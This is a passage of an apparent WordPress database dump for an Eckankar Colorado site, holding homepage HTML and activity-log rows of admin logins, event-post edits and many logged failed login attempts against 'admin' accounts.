href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(238011,40477,'post_title','Home'),(238010,40477,'post_type','page'),(238009,40477,'post_id','7160'),(238007,40476,'_message_key','user_unknown_login_failed'),(238008,40476,'_server_remote_addr','45.61.184.x'),(238006,40476,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),(238005,40476,'failed_username','administrator'),(238004,40475,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(238003,40475,'_server_remote_addr','76.130.120.x'),(238002,40475,'_message_key','user_logged_in'),(238000,40475,'_user_email','nada@zipnadanot.org'),(238001,40475,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(237999,40475,'_user_login','S8zhaBda'),(237998,40475,'_user_id','2'),(237997,40475,'user_login','S8zhaBda'),(237996,40475,'user_email','nada@zipnadanot.org'),(237994,40474,'_server_remote_addr','103.158.206.x'),(237995,40475,'user_id','2'),(237993,40474,'_message_key','user_unknown_login_failed'),(237992,40474,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(237991,40474,'failed_username','admin'),(237990,40473,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_Reminder_Week_5&utm_medium=email'),(237989,40473,'_server_remote_addr','71.218.71.x'),(237986,40473,'post_type','nf_sub'),(237987,40473,'post_title',''),(237988,40473,'_message_key','post_updated'),(237985,40473,'post_id','269308'),(237984,40472,'_server_remote_addr','54.37.156.x'),(237983,40472,'_message_key','user_unknown_login_failed'),(237982,40472,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(237981,40472,'failed_username','admin'),(237980,40471,'_server_remote_addr','23.97.205.x'),(237979,40471,'_message_key','user_unknown_login_failed'),(237978,40471,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(237977,40471,'failed_username','admin'),(237976,40470,'_server_remote_addr','77.68.87.x'),(237975,40470,'_message_key','user_unknown_login_failed'),(237972,40469,'_server_remote_addr','69.163.224.x'),(237973,40470,'failed_username','admin'),(237971,40469,'_message_key','user_unknown_login_failed'),(237969,40469,'failed_username','admin'),(237970,40469,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(237968,40468,'_server_remote_addr','107.189.7.x'),(237967,40468,'_message_key','user_unknown_login_failed'),(237966,40468,'server_http_user_agent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(237965,40468,'failed_username','admin'),(237964,40467,'_server_remote_addr','146.190.217.x'),(237963,40467,'_message_key','user_unknown_login_failed'),(237962,40467,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(237961,40467,'failed_username','admin'),(237959,40466,'_server_remote_addr','76.130.120.x'),(237960,40466,'_server_http_referer','https://eckankar-colorado.org/wp-admin/'),(237958,40466,'_message_key','user_logged_out'),(237957,40466,'_user_email','nada@zipnadanot.org'),(237956,40466,'_user_login','S8zhaBda'),(237955,40466,'_user_id','2'),(237954,40465,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=268461&action=edit'),(237953,40465,'_server_remote_addr','76.130.120.x'),(237952,40465,'_user_email','nada@zipnadanot.org'),(237950,40465,'_user_id','2'),(237951,40465,'_user_login','S8zhaBda'),(237949,40465,'_message_key','post_updated'),(237948,40465,'post_new_post_status','draft'),(237947,40465,'post_prev_post_status','publish'),(237945,40465,'post_type','mec-events'),(237946,40465,'post_title','Past Lives, Dreams and Soul Travel'),(237944,40465,'post_id','268461'),(237943,40464,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=268530&action=edit'),(237941,40464,'_user_email','nada@zipnadanot.org'),(237942,40464,'_server_remote_addr','76.130.120.x'),(237940,40464,'_user_login','S8zhaBda'),(237939,40464,'_user_id','2'),(237937,40464,'post_new_post_status','draft'),(237938,40464,'_message_key','post_updated'),(237936,40464,'post_prev_post_status','publish'),(237935,40464,'post_title','&#8216;Past Lives, Dreams and Soul Travel&#8217;<br>Book Discussion &#8211; In Person'),(237933,40464,'post_id','268530'),(237934,40464,'post_type','mec-events'),(237932,40463,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269301&action=edit'),(237931,40463,'_server_remote_addr','76.130.120.x'),(237930,40463,'_user_email','nada@zipnadanot.org'),(237928,40463,'_user_id','2'),(237929,40463,'_user_login','S8zhaBda'),(237927,40463,'_message_key','post_updated'),(237926,40463,'post_new_post_name','past-lives-dreams-and-soul-travel'),(237925,40463,'post_prev_post_name','the-power-of-grace-2-918'),(237924,40463,'post_new_post_title','Past Lives, Dreams, and Soul Travel'),(237923,40463,'post_prev_post_title','Past Lives, Dreams and Soul Travel'),(237920,40463,'post_id','269301'),(237921,40463,'post_type','mec-events'),(237922,40463,'post_title','Past Lives, Dreams, and Soul Travel'),(237919,40462,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(237917,40462,'_message_key','user_logged_in'),(237918,40462,'_server_remote_addr','76.130.120.x'),(237916,40462,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(237915,40462,'_user_email','nada@zipnadanot.org'),(237913,40462,'_user_id','2'),(237914,40462,'_user_login','S8zhaBda'),(237912,40462,'user_login','S8zhaBda'),(237909,40461,'_server_http_referer','https://eckankar-colorado.org/contact-us/'),(237910,40462,'user_id','2'),(237911,40462,'user_email','nada@zipnadanot.org'),(237908,40461,'_server_remote_addr','24.68.108.x'),(237907,40461,'_message_key','post_updated'),(237782,40431,'_message_key','user_unknown_login_failed'),(237783,40431,'_server_remote_addr','20.168.9.x'),(237784,40432,'failed_username','admin'),(237785,40432,'server_http_user_agent','Mozilla/5.0'),(237786,40432,'_message_key','user_unknown_login_failed'),(237787,40432,'_server_remote_addr','20.168.9.x'),(237788,40433,'failed_username','admin'),(237789,40433,'server_http_user_agent','Mozilla/5.0'),(237790,40433,'_message_key','user_unknown_login_failed'),(237791,40433,'_server_remote_addr','20.168.9.x'),(237792,40434,'failed_username','admin'),(237793,40434,'server_http_user_agent','Mozilla/5.0'),(237794,40434,'_message_key','user_unknown_login_failed'),(237795,40434,'_server_remote_addr','20.168.9.x'),(237796,40435,'failed_username','admin'),(237797,40435,'server_http_user_agent','Mozilla/5.0'),(237798,40435,'_message_key','user_unknown_login_failed'),(237799,40435,'_server_remote_addr','20.168.9.x'),(237800,40436,'failed_username','admin'),(237801,40436,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(237802,40436,'_message_key','user_unknown_login_failed'),(237803,40436,'_server_remote_addr','89.39.109.x'),(237804,40437,'failed_username','admin'),(237805,40437,'server_http_user_agent','Mozilla/5.0'),(237806,40437,'_message_key','user_unknown_login_failed'),(237807,40437,'_server_remote_addr','20.168.9.x'),(237808,40438,'failed_username','admin'),(237809,40438,'server_http_user_agent','Mozilla/5.0'),(237810,40438,'_message_key','user_unknown_login_failed'),(237811,40438,'_server_remote_addr','20.168.9.x'),(237812,40439,'failed_username','admin'),(237813,40439,'server_http_user_agent','Mozilla/5.0'),(237814,40439,'_message_key','user_unknown_login_failed'),(237815,40439,'_server_remote_addr','20.168.9.x'),(237816,40440,'failed_username','admin'),(237817,40440,'server_http_user_agent','Mozilla/5.0'),(237818,40440,'_message_key','user_unknown_login_failed'),(237819,40440,'_server_remote_addr','20.168.9.x'),(237820,40441,'failed_username','admin'),(237821,40441,'server_http_user_agent','Mozilla/5.0'),(237822,40441,'_message_key','user_unknown_login_failed'),(237823,40441,'_server_remote_addr','20.168.9.x'),(237824,40442,'failed_username','admin'),(237825,40442,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(237826,40442,'_message_key','user_unknown_login_failed'),(237827,40442,'_server_remote_addr','54.36.173.x'),(237828,40443,'failed_username','admin'),(237829,40443,'server_http_user_agent','Mozilla/5.0'),(237830,40443,'_message_key','user_unknown_login_failed'),(237831,40443,'_server_remote_addr','20.168.9.x'),(237832,40444,'failed_username','admin'),(237833,40444,'server_http_user_agent','Mozilla/5.0'),(237834,40444,'_message_key','user_unknown_login_failed'),(237835,40444,'_server_remote_addr','20.168.9.x'),(237836,40445,'failed_username','admin'),(237837,40445,'server_http_user_agent','Mozilla/5.0'),(237838,40445,'_message_key','user_unknown_login_failed'),(237839,40445,'_server_remote_addr','20.168.9.x'),(237840,40446,'failed_username','admin'),(237841,40446,'server_http_user_agent','Mozilla/5.0'),(237842,40446,'_message_key','user_unknown_login_failed'),(237843,40446,'_server_remote_addr','20.168.9.x'),(237844,40447,'failed_username','admin'),(237845,40447,'server_http_user_agent','Mozilla/5.0'),(237846,40447,'_message_key','user_unknown_login_failed'),(237847,40447,'_server_remote_addr','20.168.9.x'),(237848,40448,'failed_username','admin'),(237849,40448,'server_http_user_agent','Mozilla/5.0'),(237850,40448,'_message_key','user_unknown_login_failed'),(237851,40448,'_server_remote_addr','20.168.9.x'),(237852,40449,'failed_username','admin'),(237853,40449,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(237777,40430,'server_http_user_agent','Mozilla/5.0'),(237778,40430,'_message_key','user_unknown_login_failed'),(237779,40430,'_server_remote_addr','20.168.9.x'),(237905,40461,'post_type','nf_sub'),(237906,40461,'post_title',''),(237904,40461,'post_id','269306'),(237903,40460,'_server_remote_addr','210.207.92.x'),(237902,40460,'_message_key','user_unknown_login_failed'),(237901,40460,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(237900,40460,'failed_username','admin'),(237899,40459,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=Oct_2023_Chela_Newsletter&utm_medium=email'),(237898,40459,'_server_remote_addr','68.102.18.x'),(237897,40459,'_message_key','post_updated'),(237896,40459,'post_title',''),(237894,40459,'post_id','269305'),(237895,40459,'post_type','nf_sub'),(237893,40458,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(237892,40458,'_server_remote_addr','68.102.18.x'),(237890,40458,'post_title',''),(237891,40458,'_message_key','post_updated'),(237889,40458,'post_type','nf_sub'),(237888,40458,'post_id','269304'),(237887,40457,'_server_remote_addr','125.212.209.x'),(237886,40457,'_message_key','user_unknown_login_failed'),(237885,40457,'server_http_user_agent','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(237884,40457,'failed_username','admin'),(237883,40456,'_server_remote_addr','135.125.1.x'),(237882,40456,'_message_key','user_unknown_login_failed'),(237881,40456,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(237880,40456,'failed_username','admin'),(237879,40455,'_server_remote_addr','209.141.46.x'),(237878,40455,'_message_key','user_unknown_login_failed'),(237876,40455,'failed_username','administrator'),(237877,40455,'server_http_user_agent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36'),(237875,40454,'_server_remote_addr','106.52.91.x'),(237874,40454,'_message_key','user_unknown_login_failed'),(237873,40454,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(237872,40454,'failed_username','admin'),(237871,40453,'_server_remote_addr','20.168.9.x'),(237870,40453,'_message_key','user_unknown_login_failed'),(237869,40453,'server_http_user_agent','Mozilla/5.0'),(237868,40453,'failed_username','admin'),(237867,40452,'_server_remote_addr','20.168.9.x'),(237866,40452,'_message_key','user_unknown_login_failed'),(237865,40452,'server_http_user_agent','Mozilla/5.0'),(237864,40452,'failed_username','admin'),(237863,40451,'_server_remote_addr','20.168.9.x'),(237862,40451,'_message_key','user_unknown_login_failed'),(237861,40451,'server_http_user_agent','Mozilla/5.0'),(237860,40451,'failed_username','admin'),(237859,40450,'_server_remote_addr','20.168.9.x'),(237858,40450,'_message_key','user_unknown_login_failed'),(237856,40450,'failed_username','admin'),(237857,40450,'server_http_user_agent','Mozilla/5.0'),(237855,40449,'_server_remote_addr','77.68.87.x'),(237854,40449,'_message_key','user_unknown_login_failed'),(237780,40431,'failed_username','admin'),(237781,40431,'server_http_user_agent','Mozilla/5.0'),(237776,40430,'failed_username','admin'),(237774,40429,'_message_key','user_unknown_login_failed'),(237775,40429,'_server_remote_addr','181.43.100.x'),(237773,40429,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(237772,40429,'failed_username','admin'),(237771,40428,'_server_remote_addr','20.168.9.x'),(237770,40428,'_message_key','user_unknown_login_failed'),(237768,40428,'failed_username','admin'),(237769,40428,'server_http_user_agent','Mozilla/5.0'),(237767,40427,'_server_remote_addr','20.168.9.x'),(237765,40427,'server_http_user_agent','Mozilla/5.0'),(237766,40427,'_message_key','user_unknown_login_failed'),(237763,40426,'_server_remote_addr','104.244.76.x'),(237764,40427,'failed_username','admin'),(237762,40426,'_message_key','user_unknown_login_failed'),(237761,40426,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(237760,40426,'failed_username','administrator'),(237759,40425,'_server_remote_addr','20.168.9.x'),(237758,40425,'_message_key','user_unknown_login_failed'),(237757,40425,'server_http_user_agent','Mozilla/5.0'),(237756,40425,'failed_username','admin'),(237755,40424,'_server_remote_addr','20.168.9.x'),(237754,40424,'_message_key','user_unknown_login_failed'),(237752,40424,'failed_username','admin'),(237753,40424,'server_http_user_agent','Mozilla/5.0'),(237751,40423,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269301&action=edit'),(237750,40423,'_server_remote_addr','184.96.209.x'),(237748,40423,'_user_login','john-admin-96'),(237749,40423,'_user_email','nadazipought@zilch.org'),(237747,40423,'_user_id','15'),(237746,40423,'_message_key','post_updated'),(237744,40423,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(237745,40423,'post_new_post_date_gmt','2023-10-28 15:07:36'),(237743,40423,'post_new_post_date','2023-10-28 09:07:36'),(237742,40423,'post_prev_post_date','2023-10-28 09:06:54'),(237740,40423,'post_prev_post_status','draft'),(237741,40423,'post_new_post_status','publish'),(237739,40423,'post_title','Past Lives, Dreams and Soul Travel'),(237738,40423,'post_type','mec-events'),(237737,40423,'post_id','269301'),(237736,40422,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269301&action=edit'),(237735,40422,'_server_remote_addr','184.96.209.x'),(237734,40422,'_user_email','nadazipought@zilch.org'),(237733,40422,'_user_login','john-admin-96'),(237731,40422,'_message_key','post_updated'),(237732,40422,'_user_id','15'),(237730,40422,'post_new_post_date','2023-10-28 09:06:54'),(237729,40422,'post_prev_post_date','2023-10-28 09:06:05'),(237728,40422,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Past Lives, Dreams and Soul Travel<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Have you ever thought about where you go when you close your eyes - when you daydream, or at night when you dream? Sometimes our dreams and imagination seem more real than everyday life. That\'s Soul Travel. It\'s a natural process that opens the door to the incredible universes where we truly live and have our being. </span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">As Soul, a divine spark of God, we are spiritual beings with the ability to shift our state of consciousness at will and experience greater love, freedom and awareness in our daily lives. This interactive class will focus primarily on Soul Travel, (but will likely touch on Past Lives and Dreams too.) We will cover tools, or techniques, you can use on your spiritual journey, regardless of your spiritual orientation. You do not need to have attended prior classes or have read the book to participate. We will have complimentary copies available. This is the&nbsp;<strong>second</strong>&nbsp;of two classes on Soul Travel. Hope to see you there!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">What is HU? | HU is the Sound of Soul | ECKANKAR.</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-of-loveland/events/296983282/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(237726,40422,'post_title','Past Lives, Dreams and Soul Travel'),(237727,40422,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Past Lives, Dreams and Soul Travel<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Have you ever thought about where you go when you close your eyes - when you daydream, or at night when you dream? Sometimes our dreams and imagination seem more real than everyday life. That\'s Soul Travel. It\'s a natural process that opens the door to the incredible universes where we truly live and have our being. </span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">As Soul, a divine spark of God, we are spiritual beings with the ability to shift our state of consciousness at will and experience greater love, freedom and awareness in our daily lives. This interactive class will focus primarily on Soul Travel, (but will likely touch on Past Lives and Dreams too.) We will cover tools, or techniques, you can use on your spiritual journey, regardless of your spiritual orientation. You do not need to have attended prior classes or have read the book to participate. We will have complimentary copies available. This is the&nbsp;<strong>second</strong>&nbsp;of two classes on Soul Travel. Hope to see you there!</span></p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">What is HU? | HU is the Sound of Soul | ECKANKAR.</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-of-loveland/events/296983282/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(237725,40422,'post_type','mec-events'),(237724,40422,'post_id','269301'),(237722,40421,'_server_remote_addr','184.96.209.x'),(237723,40421,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269301&action=edit'),(237721,40421,'_user_email','nadazipought@zilch.org'),(237720,40421,'_user_login','john-admin-96'),(237718,40421,'_message_key','post_updated'),(237719,40421,'_user_id','15'),(237717,40421,'post_new_thumb_title','ColumnsWater'),(237716,40421,'post_new_thumb_id','269303'),(237715,40421,'post_prev_thumb_title','waterfall-illus-2'),(237714,40421,'post_prev_thumb_id','269264'),(237713,40421,'post_new_post_date','2023-10-28 09:06:05'),(237712,40421,'post_prev_post_date','2023-10-28 08:59:34'),(237688,40419,'_message_key','user_unknown_login_failed'),(237689,40419,'_server_remote_addr','156.54.11.x'),(237690,40420,'post_type','attachment'),(237691,40420,'attachment_id','269303'),(237692,40420,'attachment_title','ColumnsWater'),(237693,40420,'attachment_filename','ColumnsWater.webp'),(237694,40420,'attachment_mime','image/webp'),(237695,40420,'attachment_filesize','18200'),(237696,40420,'attachment_parent_id','269301'),(237697,40420,'attachment_parent_title','Copy of The Power of Grace'),(237698,40420,'attachment_parent_post_type','mec-events'),(237699,40420,'_message_key','attachment_created'),(237700,40420,'_user_id','15'),(237701,40420,'_user_login','john-admin-96'),(237702,40420,'_user_email','nadazipought@zilch.org'),(237703,40420,'_server_remote_addr','184.96.209.x'),(237704,40420,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269301&action=edit'),(237705,40421,'post_id','269301'),(237706,40421,'post_type','mec-events'),(237707,40421,'post_title','Past Lives, Dreams and Soul Travel'),(237708,40421,'post_prev_post_title','Copy of The Power of Grace'),(237709,40421,'post_new_post_title','Past Lives, Dreams and Soul Travel'),(237710,40421,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">A Secret to Spiritual Living<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Step confidently into a larger room, a higher consciousness, where the grace of acceptance, understanding, healing, and happiness can be 